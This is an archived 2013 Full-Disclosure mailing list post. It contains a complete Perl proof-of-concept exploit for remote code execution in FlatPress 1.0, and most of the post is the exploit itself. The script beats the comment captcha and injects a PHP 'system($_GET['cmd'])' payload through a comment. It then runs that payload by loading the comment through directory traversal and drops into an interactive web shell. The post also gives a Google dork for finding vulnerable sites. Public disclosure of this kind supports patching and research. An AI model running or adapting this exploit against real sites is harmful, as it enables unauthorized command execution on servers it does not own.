lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAFz4UQ_Awscvd623LOatbBQ=25kurNweFbcPbdAFgdtKO1wWuA@mail.gmail.com>
Date: Wed, 6 Nov 2013 08:53:14 +1100
From: Wire Ghoul <wireghoul@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Flatpress version 1.0 remote code execution
	NULLday

#!/usr/bin/perl
# Exploit Title: Flatpress remore code execution PoC NULLday
# Google Dork: This site is powered by FlatPress.
# Date: 17/10/2013
# Exploit Author: Wireghoul
# Vendor Homepage: http://flatpress.org/home/
# Software Link:
http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2
# Version: v1.0
#
# Blended threat, executes code injected into comment
# by loading comment as a page through directory traversal
# Requires the inlinePHP plugin to be enabled.
# Written by @Wireghoul - justanotherhacker.com
#
# This is for my peeps and the freaks in the front row -- Hilltop Hoods:
Nosebleed section

use strict;
use warnings;
use LWP::UserAgent;

&banner;
&usage if (!$ARGV[0]);
my $injid = 'Spl0ited'.int(rand(9999));
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->cookie_jar({ file => "tmp/flatpress-rce.txt" });

sub banner {
    print "\nFlatpress remote code execution PoC by \@Wireghoul\n";
    print "=======================[ justanotherhacker.com]==\n";
}

sub usage {
    print "Usage: $0 <url>\n";
    exit;
}

my $response =
$ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");
if (!$response->is_success) {
    print "[-] Inline PHP plugin not found at
$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";
} else {
    print "[+] Inline PHP plugin found, hopefully it is enabled!\n";
}
# Prepare for exploitation, find entry + comment location
$response = $ua->get($ARGV[0]);
if ($response->is_success) {
    if ($response->decoded_content =~
/(http.*?x=entry:entry.*?;comments:1#comments)/) {
        my $cmntlink = $1;
        print "[+] Found comment link: $cmntlink\n";
        my $aaspam = 0; # Can't be bothered solving easy captchas, just
reload page until we get one we like
        while ($aaspam == 0) {
            $response = $ua->get($cmntlink);
            if ($response->decoded_content =~ /<strong>(\d+) plus (\d+) \?
\(\*\)/) {
                $aaspam = $1+$2;
                print "[+] Defeated antispam $1 + $2 = $aaspam\n";
            } else {
                $response->decoded_content =~ m/<strong>(.*) \? \(\*\)/;
                print "[*] Unknown antispam: $1 ... retrying\n";
            }
        }
        # Post a comment
        $response = $ua->post(
            $cmntlink."form",
            Content => {
                'name' => $injid,
                'email' => '',
                'url' => '',
                'aaspam' => $aaspam,
                'content' =>
"SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",
                'submit' => 'Add',
            }
        );
        $response = $ua->get($cmntlink);
        # Find link to injected content, then execute psuedo shell in loop
        my @cmnts = split (/<li id="comment/, $response->decoded_content);
        my @injected = grep /$injid/, @cmnts;
        if ($injected[0] =~ /$injid/) {
            print "[+] Injection ($injid) successful\n";
            $injected[0] =~
m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/;
            my
$shell="$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5";
            print "[*] Dropping into shell, type exit to exit\n";
            my $line='';
            while (1) {
                print '$';
                $line=<STDIN>;
                if ($line =~ /^exit$/) { exit; };
                my $output=$ua->get("$shell&cmd=$line");
                $output->decoded_content =~ /SHELL(.*)LLEHS/ms;
                my $clean = $1; $clean =~ s/<br \/>//g;
                print "$clean\n";
            }
        } else {
            print '[-] Unable to identify the injection point';
        }
    } else {
        print "[-] Comment link not found\n";
    }
} else {
  die $response->status_line;
}

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ